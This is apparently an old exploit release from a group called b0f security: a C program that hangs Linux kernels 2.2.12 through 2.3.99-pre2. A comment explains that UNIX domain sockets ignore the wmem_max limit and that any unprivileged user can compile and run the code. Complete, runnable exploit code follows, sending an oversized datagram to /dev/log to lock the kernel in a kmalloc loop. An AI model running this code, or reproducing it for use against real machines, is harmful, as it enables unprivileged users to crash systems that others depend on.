/*            [http://b0f.morphed.net] - eth0                */
/*                                                       */
/* Vulnerable
  Linux 2.2.12
  Linux 2.2.13
  Linux 2.2.14
  Linux 2.3.99-pre2

         The following exploit code will hang any Linux machine on various
         Pentium
         platforms.
         Note that this does not require any special privileges, and any user
         can

         compile and run it, so watch out kiddies...

         The send system call immediately puts the kernel in a loop spewing
         kmalloc: Size
         (131076) too large forever (or until you hit the reset button).

         Apparently UNIX domain sockets are ignoring the
         /proc/sys/net/core/wmem_max parameter,
         despite the documentation to the contrary.

          [code provided by eth0 from b0f security]
          [information provided by Jay Fenlason]
               [http://b0f.morphed.net]
             [buffer0verfl0w security]
*/

         #include <sys/types.h>
         #include <sys/socket.h>
         #include <string.h>


         char buf[128 * 1024];

         int main ( int argc, char **argv )
         {
             struct sockaddr SyslogAddr;
             int LogFile;
             int bufsize = sizeof(buf)-5;
             int i;

             for ( i = 0; i < bufsize; i++ )
                 buf[i] = ' '+(i%95);
             buf[i] = '\0';

             SyslogAddr.sa_family = AF_UNIX;
             strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data)
         );
             LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
             sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)
         );
             return 0;
         }